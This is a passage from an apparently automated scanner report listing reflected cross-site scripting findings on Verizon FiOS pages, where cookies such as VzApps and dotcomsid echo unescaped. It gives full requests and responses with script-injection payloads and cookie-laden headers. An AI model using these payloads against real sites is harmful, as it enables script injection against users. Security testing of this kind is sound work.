ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 76227
Expires: Sat, 20 Nov 2010 02:57:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:57:28 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX4c88c<script>alert(1)</script>04868af3b9a; path=/
Set-Cookie: ContextInfo_LoopQual=; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | FIOS TV + HD TV Service
</title><meta name="keywords" content="video on demand, vod, premium cable tv, cable service, cable internet, dsl
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX4C88C<SCRIPT>ALERT(1)</SCRIPT>04868AF3B9A </DIV>
...[SNIP]...

3.290. https://www22.verizon.com/Residential/aboutFiOS/Overview.htm [VzApps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/aboutFiOS/Overview.htm

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 120ad<script>alert(1)</script>163fbe4701a was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/Overview.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX120ad<script>alert(1)</script>163fbe4701a; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70905
Expires: Sat, 20 Nov 2010 02:53:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:53:26 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:26 GMT; path=/
Set-Cookie: ContextInfo_State=TX120ad<script>alert(1)</script>163fbe4701a; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:26 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:26 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:26 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX120AD<SCRIPT>ALERT(1)</SCRIPT>163FBE4701A </DIV>
...[SNIP]...

3.291. https://www22.verizon.com/Residential/aboutFiOS/Overview.htm [VzApps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/aboutFiOS/Overview.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 79db9'><script>alert(1)</script>84341307296 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/Overview.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX79db9'><script>alert(1)</script>84341307296; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70909
Expires: Sat, 20 Nov 2010 02:53:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:53:19 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:19 GMT; path=/
Set-Cookie: ContextInfo_State=TX79db9'><script>alert(1)</script>84341307296; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:19 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:19 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:19 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX79DB9'><SCRIPT>ALERT(1)</SCRIPT>84341307296 ' />
...[SNIP]...

3.292. https://www22.verizon.com/Residential/aboutFiOS/Overview.htm [dotcomsid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/aboutFiOS/Overview.htm

Issue detail

The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6862"-alert(1)-"9695dc43a78 was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Residential/aboutFiOS/Overview.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=c6862"-alert(1)-"9695dc43a78; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 76442
Expires: Sat, 20 Nov 2010 02:53:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:53:15 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:15 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:15 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:15 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:15 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
OS Digital TV and High-Speed Internet Features','');
function startmenu()
{
}
var mvzOptIn="N";
var strdotcomval = "c6862"-alert(1)-"9695dc43a78"
if(mvzOptIn != 'Y' || strdotcomval == "")
{
    var m_view = new VZT.MasterNavView();
    var m_model = {container: document.getElementB
...[SNIP]...

3.293. https://www22.verizon.com/Residential/aboutFiOS/labs/labs.htm [VzApps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/aboutFiOS/labs/labs.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d0dac'><script>alert(1)</script>82a3c612b6a was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/labs/labs.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXd0dac'><script>alert(1)</script>82a3c612b6a; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 78167
Expires: Sat, 20 Nov 2010 02:53:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:53:26 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:26 GMT; path=/
Set-Cookie: ContextInfo_State=TXd0dac'><script>alert(1)</script>82a3c612b6a; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:26 GMT; path=/
